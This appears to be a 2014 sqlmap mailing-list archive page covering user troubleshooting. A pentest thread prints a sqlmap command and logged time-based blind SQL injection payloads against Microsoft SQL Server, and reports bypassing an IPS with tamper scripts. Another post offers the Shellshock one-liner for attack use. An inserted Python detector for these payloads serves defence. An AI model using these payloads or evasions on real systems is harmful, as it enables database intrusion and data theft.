sqlmap-users Mailing List for sqlmap (Page 19)
Brought to you by: inquisb
From: Miroslav S. <mir...@gm...> - 2014-09-30 09:22:20

http://sourceforge.net/p/sqlmap/mailman/sqlmap-users/thread/51E...@gm.../

Bye

On Tue, Sep 30, 2014 at 10:39 AM, Ogunwede Stephen <vor...@gm...> wrote:
> Hello,
> I installed smtpmap, but it keeps disappearing each time I press enter.
>
> Also I have this error on it:
>
> sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced
>
> My operating system is 32bit Windows 7.
>
> Please can you tell me what is wrong.
>
> Thanks
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Miroslav Stampar
http://about.me/stamparm
From: Ogunwede S. <vor...@gm...> - 2014-09-30 08:39:17

Hello,

I installed smtpmap, but it keeps disappearing each time I press enter.

Also I have this error on it:

sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced

My operating system is 32bit Windows 7.

Please can you tell me what is wrong.

Thanks
From: Miroslav S. <mir...@gm...> - 2014-09-29 12:06:48

Hi.

Not able to reproduce with the options you've given:

~/Dropbox/Work/sqlmap$ python sqlmap.py -u "http://trololo.cu.cc/?id=1" --tamper=varnish.py

    _
 ___ ___| |_____ ___ ___  {1.0-dev-1e636fb}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:57:00

[13:57:00] [INFO] loading tamper script 'varnish'
[13:57:01] [INFO] testing connection to the target URL
....

Please remove everything from your sqlmap directory and clone it from the beginning from our GitHub repository.

Bye

On Mon, Sep 29, 2014 at 6:35 AM, Fjodor Kozlov <fj...@gm...> wrote:
> Hi.
>
> When trying to pass --tamper=varnish.py the following error is returned:
>
> [CRITICAL] missing function 'detect(page, headers, code)' in WAF script '/opt/sqlmap/waf/varnish.py'
>
> Latest version installed tonight from GIT.
>
> Is this a bug or is there something I'm doing wrong? Other scripts are running fine (at least the ones I've tried so far).
>
> Br
> fjodork
>

--
Miroslav Stampar
http://about.me/stamparm
From: Fjodor K. <fj...@gm...> - 2014-09-29 04:35:48

Hi.

When trying to pass --tamper=varnish.py the following error is returned:

[CRITICAL] missing function 'detect(page, headers, code)' in WAF script '/opt/sqlmap/waf/varnish.py'

Latest version installed tonight from GIT.

Is this a bug or is there something I'm doing wrong? Other scripts are running fine (at least the ones I've tried so far).

Br
fjodork
From: Rodrigo Z. S. <rod...@gm...> - 2014-09-26 02:15:50

It is not every day you see so big a bug, and it even has a wiki page. :D

Just for fun, my bash is vulnerable! lol

So... Why not use it? Anyone that has access to bash in your attack, have fun!

See the article in Wikipedia: http://en.wikipedia.org/wiki/Shellshock_(software_bug)

Just run this line in your bash! After the upgrade, it will not work any more :(

env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'
From: Miroslav S. <mir...@gm...> - 2014-09-25 19:11:21

As Rodrigo stated correctly, you can use -C to specify column names manually. For forcing sqlmap to requery certain results you can use --fresh-queries.

Bye

p.s. thx for donation :)
p.p.s. I am glad that you managed to use tamper scripts to bypass IPS/WAF

On Sep 25, 2014 8:04 PM, "Rodrigo Zanatta Silva" <rod...@gm...> wrote:
> Well, about the column, it is possible, I think, use the
>
>> -D DB            DBMS database to enumerate
>> -T TBL           DBMS database table(s) to enumerate
>> -C COL           DBMS database table column(s) to enumerate
>> -X EXCLUDECOL    DBMS database table column(s) to not enumerate
>> -U USER          DBMS user to enumerate
>
> I really think the -C will search your column. There is a brute force for common columns (or was it tables?). Anyway, set your column and it will accept.
>
> 2014-09-25 10:17 GMT-03:00 floyd <flo...@ya...>:
>
>> Hi Miroslav
>>
>> Thanks for your time and for sqlmap. I hope you got the donation :)
>>
>> By now I figured out what it was: an IPS. Had to --tamper=caseselect,charencode where caseselect is just a simple .replace("SELECT","sElEcT"). What a stupid IPS.
>>
>> Is there any way to correct errors that sqlmap is getting? I sometimes have an extra character at the end of table names and would like to correct that.
>>
>> And: Is there a possibility to tell sqlmap manually which columns a table has? That would be very helpful for blind time based, because, well, it takes forever :)
>>
>> Btw. awesome resume feature on ^C !
>>
>> Best,
>> floyd
>>
>> On 24/09/14 13:03, Miroslav Stampar wrote:
>> > Hi.
>> >
>> > This looks like a permission problem while reading system tables. That would explain why DB_NAME() works and everything else fails.
>> >
>> > Bye
>> >
>> > On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...> wrote:
>> >
>> > > Hi everybody
>> > >
>> > > I'm doing a Pentest and I'm able to do a time based blind sql injection on a very big database.
>> > >
>> > > It takes some time, but that's fine for now. But sqlmap is failing when it comes to retrieving the *number of [databases, tables, columns, whatever]*:
>> > >
>> > > $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter" --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3 --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
>> > > [...snip...]
>> > > [11:57:49] [INFO] confirming Microsoft SQL Server
>> > > [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
>> > > web server operating system: Windows
>> > > web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
>> > > back-end DBMS: Microsoft SQL Server 2008
>> > > [11:57:49] [INFO] fetching database names
>> > > [11:57:49] [INFO] fetching number of databases
>> > > [11:57:49] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
>> > > [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
>> > > [11:57:49] [WARNING] time-based comparison requires larger statistical model, please wait..............................
>> > > [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
>> > > [11:58:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>> > > [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
>> > > [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
>> > > [11:59:55] [INFO] retrieved:
>> > > [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
>> > > [11:59:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
>> > > [11:59:55] [ERROR] unable to retrieve the number of databases
>> > >
>> > > However, for the *database names* sqlmap will continue with the DB_NAME(X) technique. Right now it is dumping out all the different database names, which works fine:
>> > >
>> > > [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109) WAITFOR DELAY '0:0:2'; --
>> > >
>> > > Because I got many of the following errors (and the occurrence of the error is random), I patched the time delay in the python code to be fixed to 2 seconds (maybe you want to have an option for that):
>> > >
>> > > [15:03:14] [ERROR] invalid character detected. retrying..
>> > > [15:03:14] [WARNING] increasing time delay to 3 seconds
>> > >
>> > > That works fine and I get good results. However, when I try to dump table names now (from one of the known databases) with the -D DB_NAME and --tables switch, it is again failing to retrieve the number of tables:
>> > >
>> > > [14:51:53] [INFO] fetching tables for database: DB_NAME
>> > > [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
>> > > [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66) WAITFOR DELAY '0:0:10'; --
>> > > [14:51:53] [WARNING] time-based comparison requires larger statistical model, please wait..............................
>> > > [14:52:26] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
>> > > [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97) WAITFOR DELAY '0:0:10'; --
>> > > [14:52:56] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>> > > [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101) WAITFOR DELAY '0:0:10'; --
>> > > [14:54:56] [INFO] retrieved:
>> > > [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
>> > > [...]
>> > > [14:57:27] [INFO] retrieved:
>> > > [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
>> > > [...]
>> > > [14:59:57] [INFO] retrieved:
>> > > [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
>> > > [14:59:57] [WARNING] unable to retrieve the number of tables for database 'DB_NAME'
>> > > [14:59:57] [CRITICAL] unable to retrieve the tables for any database
>> > >
>> > > Any suggestions? Using higher --time-sec, --hex or --no-cast didn't help. Using --start and --stop also didn't work. I can't get any data out of it like this.
>> > >
>> > > Best regards,
>> > > floyd
>> >
>>
>
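The payloads sqlmap logged in floyd's run, together with the IPS that matched "SELECT" literally and was beaten by caseselect and charencode, make a useful detection exercise. The following Python is an added example, not code from the thread or from sqlmap: it normalises the query string of a request line (repeated URL-decoding, whitespace collapsing, case-folding) before matching the MSSQL time-based inference pattern shown above, so keyword case-mangling and per-character encoding no longer hide it. The request lines are constructed samples.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Constructed sample request lines (not taken from the thread): a benign
# request, a payload of the shape sqlmap logged in floyd's run, the same
# inference with SELECT/WAITFOR case-mangled (what caseselect does), and
# a fully %-encoded keyword (what charencode does).
SAMPLE_REQUESTS = [
    "GET /items.aspx?id=1 HTTP/1.1",
    "GET /items.aspx?id=1%27%3B%20IF(UNICODE(SUBSTRING((SELECT%20ISNULL(CAST(LTRIM(STR(COUNT(name)))"
    "%20AS%20NVARCHAR(4000)),CHAR(32))%20FROM%20master..sysdatabases),1,1))%3E51)"
    "%20WAITFOR%20DELAY%20%270:0:2%27;%20-- HTTP/1.1",
    "GET /items.aspx?id=1';%20IF(UNICODE(SUBSTRING((sElEcT%20DB_NAME(110)),1,1))!=109)"
    "%20wAiTfOr%20dElAy%20'0:0:2';%20-- HTTP/1.1",
    "GET /items.aspx?id=1%27%3B%20%57%41%49%54%46%4F%52%20DELAY%20%270:0:5%27 HTTP/1.1",
]

# Signatures of the time-based blind MSSQL inference seen in the thread.
# They are applied to the normalised string, never to the raw parameter.
SIGNATURES = {
    "mssql-time-delay": re.compile(r"waitfor\s+delay\s+'[\d:]+'"),
    "char-inference": re.compile(r"if\s*\(\s*unicode\s*\(\s*substring\s*\("),
    "system-table-enum": re.compile(r"\b(sysdatabases|sysobjects)\b"),
}


def normalize(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the value stops changing (charencode encodes every
    character and proxies may double-encode), then collapse whitespace and
    case-fold, so sElEcT / wAiTfOr variants compare equal to the keywords."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).casefold()


def query_string(request_line: str) -> str:
    """Return the query part of a 'GET /path?query HTTP/1.1' line, or ''."""
    parts = request_line.split(" ", 2)
    if len(parts) < 2 or "?" not in parts[1]:
        return ""
    return parts[1].split("?", 1)[1]


def classify(request_line: str) -> List[str]:
    """Names of every signature that fires on the normalised query string."""
    normalized = normalize(query_string(request_line))
    return [name for name, rx in SIGNATURES.items() if rx.search(normalized)]


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Pair each request line with its findings (empty list = clean)."""
    return [(line, classify(line)) for line in lines]


if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUESTS):
        verdict = ", ".join(findings) if findings else "clean"
        print(f"{verdict:45s} {line[:70]}")
```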
From: Rodrigo Z. S. <rod...@gm...> - 2014-09-25 18:04:10

Well, about the column, it is possible, I think, use the

> -D DB            DBMS database to enumerate
> -T TBL           DBMS database table(s) to enumerate
> -C COL           DBMS database table column(s) to enumerate
> -X EXCLUDECOL    DBMS database table column(s) to not enumerate
> -U USER          DBMS user to enumerate

I really think the -C will search your column. There is a brute force for common columns (or was it tables?). Anyway, set your column and it will accept.

2014-09-25 10:17 GMT-03:00 floyd <flo...@ya...>:
> Hi Miroslav
>
> Thanks for your time and for sqlmap. I hope you got the donation :)
>
> By now I figured out what it was: an IPS. Had to --tamper=caseselect,charencode where caseselect is just a simple .replace("SELECT","sElEcT"). What a stupid IPS.
>
> Is there any way to correct errors that sqlmap is getting? I sometimes have an extra character at the end of table names and would like to correct that.
>
> And: Is there a possibility to tell sqlmap manually which columns a table has? That would be very helpful for blind time based, because, well, it takes forever :)
>
> Btw. awesome resume feature on ^C !
>
> Best,
> floyd
>
> On 24/09/14 13:03, Miroslav Stampar wrote:
> > Hi.
> >
> > This looks like a permission problem while reading system tables. That would explain why DB_NAME() works and everything else fails.
> >
> > Bye
> >
> > On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...> wrote:
> >
> > > Hi everybody
> > >
> > > I'm doing a Pentest and I'm able to do a time based blind sql injection on a very big database.
> > >
> > > It takes some time, but that's fine for now. But sqlmap is failing when it comes to retrieving the *number of [databases, tables, columns, whatever]*:
> > >
> > > $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter" --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3 --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
> > > [...snip...]
> > > [11:57:49] [INFO] confirming Microsoft SQL Server
> > > [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
> > > web server operating system: Windows
> > > web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
> > > back-end DBMS: Microsoft SQL Server 2008
> > > [11:57:49] [INFO] fetching database names
> > > [11:57:49] [INFO] fetching number of databases
> > > [11:57:49] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
> > > [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
> > > [11:57:49] [WARNING] time-based comparison requires larger statistical model, please wait..............................
> > > [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
> > > [11:58:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
> > > [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
> > > [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
> > > [11:59:55] [INFO] retrieved:
> > > [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
> > > [11:59:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
> > > [11:59:55] [ERROR] unable to retrieve the number of databases
> > >
> > > However, for the *database names* sqlmap will continue with the DB_NAME(X) technique. Right now it is dumping out all the different database names, which works fine:
> > >
> > > [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109) WAITFOR DELAY '0:0:2'; --
> > >
> > > Because I got many of the following errors (and the occurrence of the error is random), I patched the time delay in the python code to be fixed to 2 seconds (maybe you want to have an option for that):
> > >
> > > [15:03:14] [ERROR] invalid character detected. retrying..
> > > [15:03:14] [WARNING] increasing time delay to 3 seconds
> > >
> > > That works fine and I get good results. However, when I try to dump table names now (from one of the known databases) with the -D DB_NAME and --tables switch, it is again failing to retrieve the number of tables:
> > >
> > > [14:51:53] [INFO] fetching tables for database: DB_NAME
> > > [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
> > > [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66) WAITFOR DELAY '0:0:10'; --
> > > [14:51:53] [WARNING] time-based comparison requires larger statistical model, please wait..............................
> > > [14:52:26] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
> > > [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97) WAITFOR DELAY '0:0:10'; --
> > > [14:52:56] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
> > > [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101) WAITFOR DELAY '0:0:10'; --
> > > [14:54:56] [INFO] retrieved:
> > > [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
> > > [...]
> > > [14:57:27] [INFO] retrieved:
> > > [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
> > > [...]
> > > [14:59:57] [INFO] retrieved:
> > > [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
> > > [14:59:57] [WARNING] unable to retrieve the number of tables for database 'DB_NAME'
> > > [14:59:57] [CRITICAL] unable to retrieve the tables for any database
> > >
> > > Any suggestions? Using higher --time-sec, --hex or --no-cast didn't help. Using --start and --stop also didn't work. I can't get any data out of it like this.
> > >
> > > Best regards,
> > > floyd
> >
>
From: floyd <flo...@ya...> - 2014-09-25 13:17:45

Hi Miroslav

Thanks for your time and for sqlmap. I hope you got the donation :)

By now I figured out what it was: an IPS. Had to --tamper=caseselect,charencode where caseselect is just a simple .replace("SELECT","sElEcT"). What a stupid IPS.

Is there any way to correct errors that sqlmap is getting? I sometimes have an extra character at the end of table names and would like to correct that.

And: Is there a possibility to tell sqlmap manually which columns a table has? That would be very helpful for blind time based, because, well, it takes forever :)

Btw. awesome resume feature on ^C !

Best,
floyd

On 24/09/14 13:03, Miroslav Stampar wrote:
> Hi.
>
> This looks like a permission problem while reading system tables. That would explain why DB_NAME() works and everything else fails.
>
> Bye
>
> On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...> wrote:
>
> > Hi everybody
> >
> > I'm doing a Pentest and I'm able to do a time based blind sql injection on a very big database.
> >
> > It takes some time, but that's fine for now. But sqlmap is failing when it comes to retrieving the *number of [databases, tables, columns, whatever]*:
> >
> > $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter" --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3 --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
> > [...snip...]
> > [11:57:49] [INFO] confirming Microsoft SQL Server
> > [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
> > web server operating system: Windows
> > web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
> > back-end DBMS: Microsoft SQL Server 2008
> > [11:57:49] [INFO] fetching database names
> > [11:57:49] [INFO] fetching number of databases
> > [11:57:49] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
> > [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
> > [11:57:49] [WARNING] time-based comparison requires larger statistical model, please wait..............................
> > [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
> > [11:58:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
> > [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
> > [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
> > [11:59:55] [INFO] retrieved:
> > [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
> > [11:59:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
> > [11:59:55] [ERROR] unable to retrieve the number of databases
> >
> > However, for the *database names* sqlmap will continue with the DB_NAME(X) technique. Right now it is dumping out all the different database names, which works fine:
> >
> > [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109) WAITFOR DELAY '0:0:2'; --
> >
> > Because I got many of the following errors (and the occurrence of the error is random), I patched the time delay in the python code to be fixed to 2 seconds (maybe you want to have an option for that):
> >
> > [15:03:14] [ERROR] invalid character detected. retrying..
> > [15:03:14] [WARNING] increasing time delay to 3 seconds
> >
> > That works fine and I get good results. However, when I try to dump table names now (from one of the known databases) with the -D DB_NAME and --tables switch, it is again failing to retrieve the number of tables:
> >
> > [14:51:53] [INFO] fetching tables for database: DB_NAME
> > [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
> > [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66) WAITFOR DELAY '0:0:10'; --
> > [14:51:53] [WARNING] time-based comparison requires larger statistical model, please wait..............................
> > [14:52:26] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
> > [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97) WAITFOR DELAY '0:0:10'; --
> > [14:52:56] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
> > [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101) WAITFOR DELAY '0:0:10'; --
> > [14:54:56] [INFO] retrieved:
> > [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
> > [...]
> > [14:57:27] [INFO] retrieved:
> > [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
> > [...]
> > [14:59:57] [INFO] retrieved:
> > [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
> > [14:59:57] [WARNING] unable to retrieve the number of tables for database 'DB_NAME'
> > [14:59:57] [CRITICAL] unable to retrieve the tables for any database
> >
> > Any suggestions? Using higher --time-sec, --hex or --no-cast didn't help. Using --start and --stop also didn't work. I can't get any data out of it like this.
> >
> > Best regards,
> > floyd
>
From: Miroslav S. <mir...@gm...> - 2014-09-24 11:04:05
|
Hi. This looks like a permission problem while reading system tables. That would explain why DB_NAME() works and everything else fails.

Bye

On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...> wrote:
> Hi everybody
>
> I'm doing a Pentest and I'm able to do a time based blind sql injection on a very big database.
>
> It takes some time, but that's fine for now. But sqlmap is failing when it comes to retrieving the *number of [databases, tables, columns, whatever]*:
>
> $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter" --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3 --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
> [...snip...]
> [11:57:49] [INFO] confirming Microsoft SQL Server
> [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows
> web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
> back-end DBMS: Microsoft SQL Server 2008
> [11:57:49] [INFO] fetching database names
> [11:57:49] [INFO] fetching number of databases
> [11:57:49] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
> [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
> [11:57:49] [WARNING] time-based comparison requires larger statistical model, please wait..............................
> [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
> [11:58:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
> [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
> [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
> [11:59:55] [INFO] retrieved:
> [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
> [11:59:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
> [11:59:55] [ERROR] unable to retrieve the number of databases
>
> However, for the *database names* sqlmap will continue with the DB_NAME(X) technique. Right now it is dumping out all the different database names, which works fine:
>
> [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109) WAITFOR DELAY '0:0:2'; --
>
> Because I got many of the following errors (and the occurrence of the error is random), I patched the time delay in the python code to be fixed to 2 seconds (maybe you want to have an option for that):
>
> [15:03:14] [ERROR] invalid character detected. retrying..
> [15:03:14] [WARNING] increasing time delay to 3 seconds
>
